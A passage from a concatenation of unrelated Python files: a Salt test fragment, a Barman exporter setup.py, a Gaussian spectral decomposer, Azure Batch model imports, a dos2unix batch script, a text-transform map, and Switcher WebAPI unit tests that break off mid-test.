rabbitmq_vhost.absent null_host
'''
ret = self.run_state(
'rabbitmq_vhost.absent', name='null_host', test=True
)
self.assertSaltFalseReturn(ret)
|
from setuptools import setup
setup(name='barman_exporter',
version='1.0.7',
description='Barman exporter for Prometheus',
long_description='Barman exporter for Prometheus. Full description at https://github.com/ahes/prometheus-barman-exporter',
url='https://github.com/ahes/prometheus-barman-exporter',
author='Marcin Hlybin',
author_email='marcin.hlybin@gmail.com',
license='MIT',
packages=['barman_exporter'],
keywords='prometheus barman exporter barman-exporter',
entry_points={
'console_scripts': ['barman-exporter=barman_exporter.barman_exporter:main'],
},
install_requires=[
'prometheus-client',
'sh'
],
zip_safe=False)
|
import os
import pickle
# from matplotlib import pyplot as plt
import numpy as np
from . import AGD_decomposer
from . import gradient_descent
from . import ioHDF5
class GaussianDecomposer(object):
def __init__(self, filename=None, phase="one"):
if filename:
temp = pickle.load(open(filename, "rb"))
self.p = temp.p
else:
self.p = {
"alpha1": None,
"alpha2": None,
"alpha_em": None,
"alpha1_em": None,
"alpha2_em": None,
"training_results": None,
"phase": "one",
"SNR2_thresh": 5.0,
"SNR_thresh": 5.0,
"SNR_em": 5.0,
"wiggle": 0.1,
"drop_width": 10,
"min_dv": 0,
"deblend": True,
"mode": "python",
"BLFrac": 0.1,
"verbose": False,
# "plot": False,
"perform_final_fit": True,
}
def load_training_data(self, filename):
self.p["training_data"] = pickle.load(open(filename, "rb"))
def load_hdf5_data(self, filename):
return ioHDF5.fromHDF5(filename)
def dump_hdf5_data(self, data, filename):
ioHDF5.toHDF5(data, filename)
def train(
self,
alpha1_initial=None,
alpha2_initial=None,
# plot=False,
verbose=False,
mode="python",
learning_rate=0.9,
eps=0.25,
MAD=0.1,
):
""" Solve for optimal values of alpha1 (and alpha2) using training data """
if ((self.p["phase"] == "one") and (not alpha1_initial)) or (
(self.p["phase"] == "two")
and ((not alpha1_initial) or (not alpha2_initial))
):
print("Must choose initial guesses.")
print("e.g., train(alpha1_initial=1.0, alpha2_initial=100.)")
return
if not self.p["training_data"]:
print("Must first load training data.")
print('e.g., load_training_data("training_data.pickle")')
return
print("Training...")
(
self.p["alpha1"],
self.p["alpha2"],
self.p["training_results"],
) = gradient_descent.train(
alpha1_initial=alpha1_initial,
alpha2_initial=alpha2_initial,
training_data=self.p["training_data"],
phase=self.p["phase"],
SNR_thresh=self.p["SNR_thresh"],
SNR2_thresh=self.p["SNR2_thresh"],
# plot=plot,
eps=eps,
verbose=verbose,
mode=mode,
learning_rate=learning_rate,
MAD=MAD,
)
def decompose(self, xdata, ydata, edata):
""" Decompose a single spectrum using current parameters """
if (self.p["phase"] == "one") and (not self.p["alpha1"]):
print("phase = one, and alpha1 is unset")
return
if (self.p["phase"] == "two") and (
(not self.p["alpha1"]) or (not self.p["alpha2"])
):
print("phase = two, and either alpha1 or alpha2 is unset")
return
if self.p["mode"] != "conv":
a1 = 10 ** self.p["alpha1"]
a2 = 10 ** self.p["alpha2"] if self.p["phase"] == "two" else None
else:
a1 = self.p["alpha1"]
a2 = self.p["alpha2"] if self.p["phase"] == "two" else None
status, results = AGD_decomposer.AGD(
xdata,
ydata,
edata,
alpha1=a1,
alpha2=a2,
phase=self.p["phase"],
mode=self.p["mode"],
verbose=self.p["verbose"],
SNR_thresh=self.p["SNR_thresh"],
BLFrac=self.p["BLFrac"],
SNR2_thresh=self.p["SNR2_thresh"],
deblend=self.p["deblend"],
perform_final_fit=self.p["perform_final_fit"],
# plot=self.p["plot"],
)
return results
def decompose_double(self, xdata, ydata, xdata_em, ydata_em, edata, edata_em):
""" Decompose an absorption and emission pair simultaneously """
if (self.p["phase"] == "one") and (not self.p["alpha1"]):
print("phase = one, and alpha1 is unset")
return
if (self.p["phase"] == "two") and (
(not self.p["alpha1"]) or (not self.p["alpha2"])
):
print("phase = two, and either alpha1 or alpha2 is unset")
return
if self.p["mode"] != "conv":
a1 = 10 ** self.p["alpha1"]
a2 = 10 ** self.p["alpha2"] if self.p["phase"] == "two" else None
aem = 10 ** self.p["alpha_em"]
wgle = self.p["wiggle"]
dw = self.p["drop_width"]
mdv = self.p["min_dv"]
else:
a1 = self.p["alpha1"]
a2 = self.p["alpha2"] if self.p["phase"] == "two" else None
aem = self.p["alpha_em"]
status, results = AGD_decomposer.AGD_double(
xdata,
ydata,
xdata_em,
ydata_em,
edata,
edata_em,
# scale=self.p["scale"],
alpha1=a1,
alpha2=a2,
alpha_em=aem,
wiggle=self.p["wiggle"],
drop_width=self.p["drop_width"],
min_dv=self.p["min_dv"],
phase=self.p["phase"],
mode=self.p["mode"],
verbose=self.p["verbose"],
SNR_thresh=self.p["SNR_thresh"],
BLFrac=self.p["BLFrac"],
SNR2_thresh=self.p["SNR2_thresh"],
SNR_em=self.p["SNR_em"],
deblend=self.p["deblend"],
perform_final_fit=self.p["perform_final_fit"],
# plot=self.p["plot"],
)
return results
def status(self):
""" Return current values of parameters """
print("Current Parameters:")
print("---" * 10)
for index, key in enumerate(self.p):
if key in [
"data_list",
"errors",
"x_values",
"amplitudes",
"fwhms",
"means",
"amplitudes_fit",
"fwhms_fit",
"means_fit",
]:
print("len({0}) = {1}".format(key, len(self.p[key])))
else:
print(key, " = ", self.p[key])
def set(self, key, value):
if key in self.p:
self.p[key] = value
else:
print("Given key does not exist.")
def save_state(self, filename, clobber=False):
""" Save the current decomposer object, and all
associated parameters to a python pickle file."""
if os.path.isfile(filename):
if clobber:
os.remove(filename)
else:
print("File exists: ", filename)
return
pickle.dump(self, open(filename, "wb"))
def batch_decomposition(self, science_data_path, ilist=None):
""" Science data sould be AGD format
ilist is either None or an integer list"""
# Dump information to hard drive to allow multiprocessing
pickle.dump(
[self, science_data_path, ilist], open("batchdecomp_temp.pickle", "wb")
)
from . import batch_decomposition
batch_decomposition.init()
result_list = batch_decomposition.func()
print("SUCCESS")
new_keys = [
"index_fit",
"amplitudes_fit",
"fwhms_fit",
"means_fit",
"index_initial",
"amplitudes_initial",
"fwhms_initial",
"means_initial",
"amplitudes_fit_err",
"fwhms_fit_err",
"means_fit_err",
"best_fit_rchi2",
"amplitudes_fit_em",
"fwhms_fit_em",
"means_fit_em",
"means_fit_err_em",
"amplitudes_fit_err_em",
"fwhms_fit_err_em",
"fit_labels",
]
output_data = dict((key, []) for key in new_keys)
for i, result in enumerate(result_list):
# print(result.keys())
# print(result)
# Save best-fit parameters
ncomps = result["N_components"]
amps = result["best_fit_parameters"][0:ncomps] if ncomps > 0 else []
fwhms = (
result["best_fit_parameters"][ncomps : 2 * ncomps] if ncomps > 0 else []
)
offsets = (
result["best_fit_parameters"][2 * ncomps : 3 * ncomps]
if ncomps > 0
else []
)
output_data["amplitudes_fit"].append(amps)
output_data["fwhms_fit"].append(fwhms)
output_data["means_fit"].append(offsets)
output_data["index_fit"].append([i for j in range(ncomps)])
# Save initial guesses if something was found
ncomps_initial = len(result["initial_parameters"]) // 3
amps_initial = (
result["initial_parameters"][0:ncomps_initial]
if ncomps_initial > 0
else []
)
fwhms_initial = (
result["initial_parameters"][ncomps_initial : 2 * ncomps_initial]
if ncomps_initial > 0
else []
)
offsets_initial = (
result["initial_parameters"][2 * ncomps_initial : 3 * ncomps_initial]
if ncomps_initial > 0
else []
)
output_data["means_initial"].append(offsets_initial)
output_data["fwhms_initial"].append(fwhms_initial)
output_data["amplitudes_initial"].append(amps_initial)
output_data["index_initial"].append([i for j in range(ncomps_initial)])
# Final fit errors
rchi2 = [result["rchi2"]] if "rchi2" in result else None
amps_err = result["best_fit_errors"][0:ncomps] if ncomps_initial > 0 else []
fwhms_err = (
result["best_fit_errors"][ncomps : 2 * ncomps]
if ncomps_initial > 0
else []
)
offsets_err = (
result["best_fit_errors"][2 * ncomps : 3 * ncomps]
if ncomps_initial > 0
else []
)
output_data["best_fit_rchi2"].append(rchi2)
output_data["means_fit_err"].append(offsets_err)
output_data["fwhms_fit_err"].append(fwhms_err)
output_data["amplitudes_fit_err"].append(amps_err)
if self.p["alpha_em"] is not None:
ncomps = (
len(result["best_fit_parameters_em"]) // 3
if "best_fit_parameters_em" in result
else 0
)
# print("to save:", ncomps)
amps = (
result["best_fit_parameters_em"][0:ncomps]
if "best_fit_parameters_em" in result
else []
)
fwhms = (
result["best_fit_parameters_em"][ncomps : 2 * ncomps]
if "best_fit_parameters_em" in result
else []
)
offsets = (
result["best_fit_parameters_em"][2 * ncomps : 3 * ncomps]
if "best_fit_parameters_em" in result
else []
)
fit_labels = (
result["fit_labels"] if "best_fit_parameters_em" in result else []
)
output_data["amplitudes_fit_em"].append(amps)
output_data["fwhms_fit_em"].append(fwhms)
output_data["means_fit_em"].append(offsets)
output_data["fit_labels"].append(fit_labels)
amps_err = (
result["best_fit_errors_em"][0:ncomps]
if "best_fit_parameters_em" in result
else []
)
fwhms_err = (
result["best_fit_errors_em"][ncomps : 2 * ncomps]
if "best_fit_parameters_em" in result
else []
)
offsets_err = (
result["best_fit_errors_em"][2 * ncomps : 3 * ncomps]
if "best_fit_parameters_em" in result
else []
)
output_data["means_fit_err_em"].append(offsets_err)
output_data["fwhms_fit_err_em"].append(fwhms_err)
output_data["amplitudes_fit_err_em"].append(amps_err)
print("100 finished.%")
return output_data
# def plot_components(
# self,
# data,
# index,
# xlabel="x",
# ylabel="y",
# xlim=None,
# ylim=None,
# guesses=False,
# plot_true=False,
# ):
# # Extract info from data (must contain 'fit' categories)
# x = data["x_values"][index]
# y = data["data_list"][index]
#
# fwhms = data["fwhms_fit"][index]
# amps = data["amplitudes_fit"][index]
# means = data["means_fit"][index]
#
# fwhms_guess = data["fwhms_initial"][index]
# amps_guess = data["amplitudes_initial"][index]
# means_guess = data["means_initial"][index]
#
# ncomps = len(amps)
#
# if "amplitudes" in data:
# fwhms_true = data["fwhms"][index]
# amps_true = data["amplitudes"][index]
# means_true = data["means"][index]
#
# plt.plot(x, y, "-k", label="data", lw=1.5)
#
# # Plot fitted, components
# sum_fit = x * 0.0
# for i, amp in enumerate(amps):
# model = amp * np.exp(-(x - means[i]) ** 2 / 2.0 / (fwhms[i] / 2.355) ** 2)
# model_guess = amps_guess[i] * np.exp(
# -(x - means_guess[i]) ** 2 / 2.0 / (fwhms_guess[i] / 2.355) ** 2
# )
# sum_fit = sum_fit + model
# plt.plot(x, model, "-g", lw=0.5)
# if guesses:
# plt.plot(x, model_guess, "--g", lw=1)
# plt.xlabel(xlabel, fontsize=16)
# plt.ylabel(ylabel, fontsize=16)
# if xlim:
# plt.xlim(*xlim)
# if ylim:
# plt.ylim(*ylim)
# plt.plot(x, sum_fit, "-g", lw=1.0, label="Fit")
#
# # If available, plot True components
# sum_true = x * 0.0
# if ("amplitudes" in data) and plot_true:
# for i, amp in enumerate(amps_true):
# model_true = amps_true[i] * np.exp(
# -(x - means_true[i]) ** 2 / 2.0 / (fwhms_true[i] / 2.355) ** 2
# )
# sum_true = sum_true + model_true
# plt.plot(x, model_true, "-r", lw=0.5)
# plt.plot(x, sum_true, "-r", lw=1.0, label="True")
#
# plt.title("index = {0}, ncomps = {1}".format(index, ncomps), fontsize=16)
# plt.legend(loc=0)
# plt.legend(loc=1)
# plt.show()
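# A minimal single-spectrum sketch, not part of the original module. The
# parameter value is illustrative and xdata/ydata/edata are user-supplied
# 1-D arrays (channels, spectrum, per-channel errors):
#
#   g = GaussianDecomposer()
#   g.set("phase", "one")
#   g.set("alpha1", 0.5)  # log10 of the regularization parameter (non-"conv" mode)
#   results = g.decompose(xdata, ydata, edata)
#   # results["best_fit_parameters"] is ordered [amplitudes..., fwhms..., means...]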
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .auto_storage_base_properties import AutoStorageBaseProperties
from .key_vault_reference import KeyVaultReference
from .batch_account_create_parameters import BatchAccountCreateParameters
from .auto_storage_properties import AutoStorageProperties
from .batch_account import BatchAccount
from .batch_account_update_parameters import BatchAccountUpdateParameters
from .batch_account_regenerate_key_parameters import BatchAccountRegenerateKeyParameters
from .batch_account_keys import BatchAccountKeys
from .activate_application_package_parameters import ActivateApplicationPackageParameters
from .application_create_parameters import ApplicationCreateParameters
from .application_package import ApplicationPackage
from .application import Application
from .application_update_parameters import ApplicationUpdateParameters
from .batch_location_quota import BatchLocationQuota
from .resource import Resource
from .operation_display import OperationDisplay
from .operation import Operation
from .batch_account_paged import BatchAccountPaged
from .application_paged import ApplicationPaged
from .operation_paged import OperationPaged
from .batch_management_client_enums import (
PoolAllocationMode,
ProvisioningState,
AccountKeyType,
PackageState,
)
__all__ = [
'AutoStorageBaseProperties',
'KeyVaultReference',
'BatchAccountCreateParameters',
'AutoStorageProperties',
'BatchAccount',
'BatchAccountUpdateParameters',
'BatchAccountRegenerateKeyParameters',
'BatchAccountKeys',
'ActivateApplicationPackageParameters',
'ApplicationCreateParameters',
'ApplicationPackage',
'Application',
'ApplicationUpdateParameters',
'BatchLocationQuota',
'Resource',
'OperationDisplay',
'Operation',
'BatchAccountPaged',
'ApplicationPaged',
'OperationPaged',
'PoolAllocationMode',
'ProvisioningState',
'AccountKeyType',
'PackageState',
]
|
#!/usr/bin/env python
"""
dos2unix Batch Utility Script
=============================
First, use this for most things:
find . -name '*.txt' | xargs dos2unix
Second, this is a little smarter (might be faster), and I can control the
globbing a little better.
TODO
----
- implement some accounting (scanned, detected, fixed, directories, etc)
"""
import os
import re
import subprocess
__version__ = '0.0.0'
#=============================================================================
def d2u( path, recursive = False, verbose = False ):
"""
Convert DOS-style line endings to UNIX-style line endings as a batch.
"""
# list of files in path
files = os.listdir( path )
# list of files to fix (once we close their scanning handles)
fixes = []
# list of directories we encountered
dirs = []
# loop through each file
for filename in files:
# create a complete path to the file
file_path = path + os.path.sep + filename
# see if this is a directory
if os.path.isdir( file_path ):
dirs.append( filename )
continue
# ensure filename matches list of patterns
# ZIH - implement list of patterns
match = re.match( r'.+\.txt$', filename )
if match is None:
continue
# check file for \r
with open( file_path, 'rb' ) as fh:
chunk = fh.read( 256 )
if b'\r' in chunk:
fixes.append( filename )
# fix all the files
for fix in fixes:
# convert this file in-place
result = dos2unix( ( path + os.path.sep + fix ), verbose = verbose )
# check result
if result != os.EX_OK:
return result
# check for recursive being enabled
if recursive == True:
# do the same thing in each directory
for filename in dirs:
# the complete name to the directory
directory = path + os.path.sep + filename
# print verbose messages
if verbose == True:
print( 'Entering: {}'.format( directory ) )
# batch process this directory
result = d2u( directory, recursive = True, verbose = verbose )
# check result
if result != os.EX_OK:
return result
# everything seemed to work
return os.EX_OK
#=============================================================================
def dos2unix( path, verbose = False ):
"""
Front-end the dos2unix program in case we want to replace it later.
"""
if verbose == True:
print( 'Converting: {}'.format( path ) )
return subprocess.call( [ 'dos2unix', path ] )
#=============================================================================
def _test():
"""
Executes a built-in unit test.
"""
# modules needed only for testing
import tempfile
import shutil
# create a directory in the system's temporary storage
test_dir = tempfile.mkdtemp()
# create a sub-directory to test recursion
sub_dir = test_dir + os.path.sep + 'sub'
os.mkdir( sub_dir )
# create a set of files to test scanning, detection, and fixing
files = [ 'd0.txt', 'd1.txt', 'm.txt', 'x.txt', 'u0.txt', 'u1.txt' ]
content = "this is a{1}test for {0}{1}line endings{1}{1}"
contents = {
'd' : [ 'DOS-style', '\r\n' ],
'u' : [ 'UNIX-style', '\n' ]
}
# local function for creating files
def make_test_files( prefix ):
for filename in files:
if filename[ 0 ] in contents:
path = prefix + os.path.sep + filename
with open( path, 'wb' ) as tfh:
tfh.write( content.format( *contents[ filename[ 0 ] ] ).encode( 'ascii' ) )
# local function for testing the conversion
def check_test_files( prefix ):
for filename in files:
if filename[ 0 ] in contents:
path = prefix + os.path.sep + filename
with open( path, 'rb' ) as tfh:
actual = tfh.read()
if b'\r' in actual:
print( 'Failed to convert file {}.'.format( path ) )
# create a few files in the temp directory
make_test_files( test_dir )
# create a couple in the sub-directory
make_test_files( sub_dir )
#### ZIH - execute actual tests here
#### ZIH - also add a test for mixed line-endings
# delete all the test files and directories
shutil.rmtree( test_dir )
# return the result of testing
return os.EX_OK
#=============================================================================
def main( argv ):
"""
Script execution entry point
@param argv Arguments passed to the script
@return Exit code (0 = success)
"""
# imports when using this as a script
import argparse
# create and configure an argument parser
parser = argparse.ArgumentParser(
description = 'dos2unix Batch Utility Script',
add_help = False
)
parser.add_argument(
'-h',
'--help',
default = False,
help = 'Display this help message and exit.',
action = 'help'
)
parser.add_argument(
'-p',
'--print',
default = False,
help = 'Print conversions along the way.',
action = 'store_true'
)
parser.add_argument(
'-r',
'--recursive',
default = False,
help = 'Enables recursive scanning of sub-directories.',
action = 'store_true'
)
parser.add_argument(
'-t',
'--test',
default = False,
help = 'Execute the built-in unit test.',
action = 'store_true'
)
parser.add_argument(
'-v',
'--version',
default = False,
help = 'Display script version and exit.',
action = 'version',
version = __version__
)
parser.add_argument(
'path',
default = None,
nargs = '?',
help = 'Path to scan for line-ending conversion.'
)
# parse the arguments
args = parser.parse_args( argv[ 1 : ] )
# check for test request
if args.test == True:
return _test()
# check for normal path specification
if ( 'path' in args ) and ( args.path is not None ):
path = args.path
# default assumes we want to use current directory
else:
path = os.getcwd()
# call the d2u batch utility
status = d2u( path, recursive = args.recursive, verbose = args.print )
# return status
return status
#=============================================================================
if __name__ == "__main__":
import os
import sys
sys.exit( main( sys.argv ) )
|
from . import textakel
FUNCTIONS = {
"alphabetical": textakel.alphabetical,
"capitalize": textakel.capitalize,
"casefold": textakel.casefold,
"count_multiples": textakel.count_multiples,
"lower": textakel.lower,
"remove-consonant": textakel.remove_consonant,
"remove-digit": textakel.remove_digit,
"remove-letter": textakel.remove_letter,
"remove-punctuation": textakel.remove_punctuation,
"remove-space": textakel.remove_space,
"remove-vowel": textakel.remove_vowel,
"reverse": textakel.reverse,
"rot13": textakel.rot13,
"stretch": textakel.stretch,
"swap-pairs": textakel.swap_pairs,
"swap-umlaut": textakel.swap_umlaut,
"swapcase": textakel.swapcase,
"title": textakel.title,
"upper": textakel.upper
}
def get_function(name):
return FUNCTIONS[name]
def get_functions():
return list(FUNCTIONS.keys())
def takel(function_name, s):
function = get_function(function_name)
return function(s)
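# Usage sketch (assumes the textakel module provides the listed functions
# with a single-string signature; outputs shown are the expected ones):
#
#   takel("upper", "hello")    # -> "HELLO"
#   takel("reverse", "hello")  # -> "olleh"
#   get_functions()            # -> ["alphabetical", "capitalize", ...]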
|
"""Unit tests for the Switcher WebAPI.
.. codeauthor:: Tomer Figenblat <tomer.figenblat@gmail.com>
"""
from aiohttp import ClientSession
from aioswitcher.api.messages import ResponseMessageType
from aioswitcher.consts import STATE_ON, WEEKDAY_TUP
from asynctest import MagicMock, patch
from bs4 import BeautifulSoup
import consts
import mappings
from helpers import get_local_ip_address, get_next_weekday
BASE_URL_FORMAT = (
"http://"
+ get_local_ip_address()
+ ":"
+ str(consts.TEST_SERVER_PORT)
+ "{}"
)
URL_GET_STATE = BASE_URL_FORMAT.format(mappings.URL_MAPPING_GET_STATE)
URL_TURN_ON = BASE_URL_FORMAT.format(mappings.URL_MAPPING_TURN_ON)
URL_TURN_OFF = BASE_URL_FORMAT.format(mappings.URL_MAPPING_TURN_OFF)
URL_GET_SCHEDULES = BASE_URL_FORMAT.format(mappings.URL_MAPPING_GET_SCHEDULES)
URL_SET_AUTO_SHUTDOWN = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_SET_AUTO_SHUTDOWN
)
URL_SET_DEVICE_NAME = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_SET_DEVICE_NAME
)
URL_ENABLE_SCHEDULE = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_ENABLE_SCHEDULE
)
URL_DISABLE_SCHEDULE = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_DISABLE_SCHEDULE
)
URL_DELETE_SCHEDULE = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_DELETE_SCHEDULE
)
URL_CREATE_SCHEDULE = BASE_URL_FORMAT.format(
mappings.URL_MAPPING_CREATE_SCHEDULE
)
async def test_create_schedule_request(
create_schedule_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/create_schedule request.
Args:
create_schedule_response: fixture of mocked
``SwitcherV2CreateScheduleResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.create_schedule",
return_value=create_schedule_response,
):
async with ClientSession() as session:
selected_test_day = WEEKDAY_TUP[get_next_weekday()]
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "20",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "24",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Unknown start_hours, accepts 0 to 23."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_START_MINUTES: "60",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Unknown start_minutes, accepts 0 to 59."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "24",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Unknown stop_hours, accepts 0 to 23."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "60",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Unknown stop_minutes, accepts 0 to 59."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text == "Error: Argument start_hours is missing."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument start_minutes is missing."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text == "Error: Argument stop_hours is missing."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "23",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text == "Error: Argument stop_minutes is missing."
)
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: ["Fakeday"],
consts.PARAM_START_HOURS: "20",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Unrecognized day requests, check documentation."
)
async with session.put(URL_CREATE_SCHEDULE) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert bs4scrap.text == "Error: Json body is missing."
create_schedule_response.msg_type = ResponseMessageType.STATE
async with session.put(
URL_CREATE_SCHEDULE,
**{
"json": {
consts.PARAM_DAYS: [selected_test_day],
consts.PARAM_START_HOURS: "20",
consts.PARAM_START_MINUTES: "0",
consts.PARAM_STOP_HOURS: "20",
consts.PARAM_STOP_MINUTES: "30",
}
},
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_delete_schedule_request(
delete_schedule_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/delete_schedule request.
Args:
delete_schedule_response: fixture of mocked
``SwitcherV2DeleteScheduleResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.delete_schedule",
return_value=delete_schedule_response,
):
async with ClientSession() as session:
async with session.delete(
URL_DELETE_SCHEDULE, params={consts.PARAM_SCHEDULE_ID: "2"}
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.delete(
URL_DELETE_SCHEDULE,
**{"json": {consts.PARAM_SCHEDULE_ID: "2"}},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.delete(
URL_DELETE_SCHEDULE, params={consts.PARAM_SCHEDULE_ID: "8"}
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument schedule_id accepts values 0-7."
)
async with session.delete(URL_DELETE_SCHEDULE) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text == "Error: Argument schedule_id is missing."
)
delete_schedule_response.msg_type = ResponseMessageType.STATE
async with session.delete(
URL_DELETE_SCHEDULE, params={consts.PARAM_SCHEDULE_ID: "2"}
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_disable_schedule_request(
disable_enable_schedule_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/disable_schedule request.
Args:
disable_enable_schedule_response: fixture of mocked
``SwitcherV2DisableEnableScheduleResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.disable_enable_schedule",
return_value=disable_enable_schedule_response,
):
async with ClientSession() as session:
async with session.patch(
URL_DISABLE_SCHEDULE,
params={
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.patch(
URL_DISABLE_SCHEDULE,
**{
"json": {
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
}
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.patch(
URL_DISABLE_SCHEDULE,
params={consts.PARAM_SCHEDULE_DATA: "not_24_len"},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument schedule_data is length is no 24."
)
async with session.patch(URL_DISABLE_SCHEDULE) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument schedule_data is missing."
)
disable_enable_schedule_response.msg_type = (
ResponseMessageType.STATE
)
async with session.patch(
URL_DISABLE_SCHEDULE,
params={
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
},
) as response:
assert response.status == 200
body = await response.json()
assert not body[consts.KEY_SUCCESSFUL]
assert consts.KEY_MESSAGE in body
async def test_enable_schedule_request(
disable_enable_schedule_response: MagicMock,
) -> None:
"""Unit test-cases for /switcher/enable_schedule request.
Args:
disable_enable_schedule_response: fixture of mocked
``SwitcherV2DisableEnableScheduleResponseMSG`` object.
"""
with patch(
"request_handlers.SwitcherV2Api.disable_enable_schedule",
return_value=disable_enable_schedule_response,
):
async with ClientSession() as session:
async with session.patch(
URL_ENABLE_SCHEDULE,
params={
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.patch(
URL_ENABLE_SCHEDULE,
**{
"json": {
consts.PARAM_SCHEDULE_DATA: consts.DUMMY_SCHEDULE_DATA
}
},
) as response:
assert response.status == 200
body = await response.json()
assert body[consts.KEY_SUCCESSFUL]
async with session.patch(
URL_ENABLE_SCHEDULE,
params={consts.PARAM_SCHEDULE_DATA: "not_24_len"},
) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
bs4scrap.text
== "Error: Argument schedule_data is length is no 24."
)
async with session.patch(URL_ENABLE_SCHEDULE) as response:
assert response.status == 400
body = await response.text()
bs4scrap = BeautifulSoup(body, "html.parser")
assert (
